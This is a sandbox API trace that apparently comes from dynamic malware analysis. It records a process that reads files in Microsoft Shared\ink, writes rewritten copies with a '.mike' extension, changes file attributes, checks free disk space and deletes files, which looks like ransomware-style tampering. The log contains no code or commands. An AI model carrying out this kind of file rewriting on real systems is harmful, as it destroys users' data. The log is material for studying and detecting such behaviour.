[0043.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.829] GetFileType (hFile=0x264) returned 0x1 [0043.829] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.829] GetFileType (hFile=0x264) returned 0x1 [0043.829] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.829] WriteFile (in: hFile=0x264, lpBuffer=0x21c55a4*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21c55a4*, lpNumberOfBytesWritten=0x2af0bc*=0x9e0, lpOverlapped=0x0) returned 1 [0043.829] CloseHandle (hObject=0x264) returned 1 [0043.830] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.830] GetFileType (hFile=0x264) returned 0x1 [0043.830] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.831] GetFileType (hFile=0x264) returned 0x1 [0043.832] WriteFile (in: hFile=0x264, lpBuffer=0x21c87b8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21c87b8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.832] CloseHandle (hObject=0x264) returned 1 [0043.832] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.832] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4541660, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4541660, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4541660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.833] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.833] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21c9e68 | out: lpFileInformation=0x21c9e68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4541660, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4541660, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4541660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.833] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.833] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", dwFileAttributes=0x80) returned 0 [0043.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.834] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.834] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4541660, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4541660, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4541660, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.834] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.834] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.834] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike")) returned 1 [0043.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.835] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.835] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.835] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.853] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.853] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.853] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.854] GetFileType (hFile=0x264) returned 0x1 [0043.854] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.854] GetFileType (hFile=0x264) returned 0x1 [0043.854] CloseHandle (hObject=0x264) returned 1 [0043.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.854] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.854] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.855] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.855] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cbdc8 | out: lpFileInformation=0x21cbdc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0043.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.855] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cc0b8 | out: lpFileInformation=0x21cc0b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0043.855] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.855] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.856] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.856] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.856] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.856] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.857] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.857] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.857] GetFileType (hFile=0x264) returned 0x1 [0043.857] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.857] GetFileType (hFile=0x264) returned 0x1 [0043.857] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.858] WriteFile (in: hFile=0x264, lpBuffer=0x21cce0c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21cce0c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.859] CloseHandle (hObject=0x264) returned 1 [0043.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.859] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), fInfoLevelId=0x0, lpFileInformation=0x21cc950 | out: lpFileInformation=0x21cc950*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08)) returned 1 [0043.859] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.859] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.860] GetFileType (hFile=0x264) returned 0x1 [0043.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.860] GetFileType (hFile=0x264) returned 0x1 [0043.860] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.860] ReadFile (in: hFile=0x264, lpBuffer=0x21cdf20, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21cdf20*, lpNumberOfBytesRead=0x2af0c8*=0xa08, lpOverlapped=0x0) returned 1 [0043.863] CloseHandle (hObject=0x264) returned 1 [0043.864] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.864] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.864] GetFileType (hFile=0x264) returned 0x1 [0043.864] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.864] GetFileType (hFile=0x264) returned 0x1 [0043.864] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.864] WriteFile (in: hFile=0x264, lpBuffer=0x21d49f8*, nNumberOfBytesToWrite=0xa10, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21d49f8*, lpNumberOfBytesWritten=0x2af0bc*=0xa10, lpOverlapped=0x0) returned 1 [0043.865] CloseHandle (hObject=0x264) returned 1 [0043.866] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.866] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.866] GetFileType (hFile=0x264) returned 0x1 [0043.866] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.866] GetFileType (hFile=0x264) returned 0x1 [0043.867] WriteFile (in: hFile=0x264, lpBuffer=0x21d7c0c*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21d7c0c*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.867] CloseHandle (hObject=0x264) returned 1 [0043.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe458d920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe458d920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe458d920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0043.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.868] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.868] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21d92bc | out: lpFileInformation=0x21d92bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe458d920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe458d920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe458d920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0043.868] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.868] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.868] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", dwFileAttributes=0x80) returned 0 [0043.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.870] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.870] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe458d920, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe458d920, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe458d920, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc30)) returned 1 [0043.870] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpFilePart=0x0) returned 0x3d [0043.870] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike", lpFilePart=0x0) returned 0x42 [0043.870] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.mike")) returned 1 [0043.871] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: 